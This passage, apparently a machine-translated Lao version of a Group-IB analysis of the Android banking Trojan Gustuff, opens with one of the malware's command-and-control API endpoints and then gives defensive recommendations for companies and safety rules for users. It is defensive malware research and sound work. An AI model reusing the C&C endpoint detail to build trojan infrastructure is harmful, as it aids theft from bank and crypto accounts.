http://<%CnC%>/api/v1/set_error.php - ແຈ້ງການຄວາມຜິດພາດທີ່ເກີດຂຶ້ນ.

ຂໍ້ສະເຫນີແນະ

ເພື່ອປົກປ້ອງລູກຄ້າຂອງພວກເຂົາຈາກການຂົ່ມຂູ່ຂອງ Trojan ມືຖື, ບໍລິສັດຕ້ອງໃຊ້ວິທີແກ້ໄຂທີ່ສົມບູນແບບທີ່ອະນຸຍາດໃຫ້ພວກເຂົາຕິດຕາມແລະປ້ອງກັນກິດຈະກໍາທີ່ເປັນອັນຕະລາຍໂດຍບໍ່ຕ້ອງຕິດຕັ້ງຊອບແວເພີ່ມເຕີມໃນອຸປະກອນຂອງຜູ້ໃຊ້.

ເພື່ອເຮັດສິ່ງນີ້, ວິທີການລາຍເຊັນສໍາລັບການກວດສອບ Trojan ມືຖືຕ້ອງໄດ້ຮັບການເສີມສ້າງດ້ວຍເຕັກໂນໂລຢີສໍາລັບການວິເຄາະພຶດຕິກໍາຂອງທັງລູກຄ້າແລະແອັບພລິເຄຊັນເອງ. ການປົກປ້ອງຄວນປະກອບມີຟັງຊັນການລະບຸອຸປະກອນໂດຍໃຊ້ເທັກໂນໂລຍີລາຍນິ້ວມືດິຈິຕອລ, ເຊິ່ງຈະເຮັດໃຫ້ສາມາດເຂົ້າໃຈໄດ້ວ່າເມື່ອໃດບັນຊີໜຶ່ງຖືກໃຊ້ຈາກອຸປະກອນທີ່ບໍ່ທຳມະດາ ແລະໄດ້ຕົກຢູ່ໃນມືຂອງຜູ້ສໍ້ໂກງແລ້ວ.

ຈຸດສໍາຄັນພື້ນຖານແມ່ນຄວາມພ້ອມຂອງການວິເຄາະຂ້າມຊ່ອງທາງ, ເຊິ່ງຊ່ວຍໃຫ້ບໍລິສັດສາມາດຄວບຄຸມຄວາມສ່ຽງທີ່ເກີດຂື້ນບໍ່ພຽງແຕ່ໃນອິນເຕີເນັດ, ແຕ່ຍັງຢູ່ໃນຊ່ອງທາງມືຖື, ສໍາລັບຕົວຢ່າງ, ໃນແອັບພລິເຄຊັນສໍາລັບທະນາຄານມືຖື, ການເຮັດທຸລະກໍາກັບ cryptocurrencies ແລະອື່ນໆ. ທຸລະກໍາສາມາດດໍາເນີນທຸລະກໍາທາງດ້ານການເງິນ.

ກົດລະບຽບຄວາມປອດໄພສໍາລັບຜູ້ໃຊ້:

ຢ່າຕິດຕັ້ງແອັບພລິເຄຊັນສໍາລັບອຸປະກອນມືຖືທີ່ມີ Android OS ຈາກແຫຼ່ງອື່ນນອກເຫນືອຈາກ Google Play, ເອົາໃຈໃສ່ເປັນພິເສດຕໍ່ສິດທິທີ່ຮ້ອງຂໍໂດຍແອັບພລິເຄຊັນ;
ຕິດຕັ້ງການປັບປຸງ Android OS ເປັນປະຈໍາ;
ເອົາໃຈໃສ່ກັບການຂະຫຍາຍຂອງໄຟລ໌ດາວໂຫຼດ;
ບໍ່ໄປຢ້ຽມຢາມຊັບພະຍາກອນທີ່ຫນ້າສົງໄສ;
ຢ່າຄລິກໃສ່ການເຊື່ອມຕໍ່ທີ່ໄດ້ຮັບໃນຂໍ້ຄວາມ SMS.

ນຳສະແດງໂດຍ Semyon Rogacheva, ຜູ້ຊ່ຽວຊານຊັ້ນສູງໃນການຄົ້ນຄວ້າ malware ຢູ່ Group-IB Computer Forensics Laboratory.

ແຫຼ່ງຂໍ້ມູນ: www.habr.com

ວິທີທີ່ Android Trojan Gustuff skims ຄີມ (fiat ແລະ crypto) ຈາກບັນຊີຂອງທ່ານ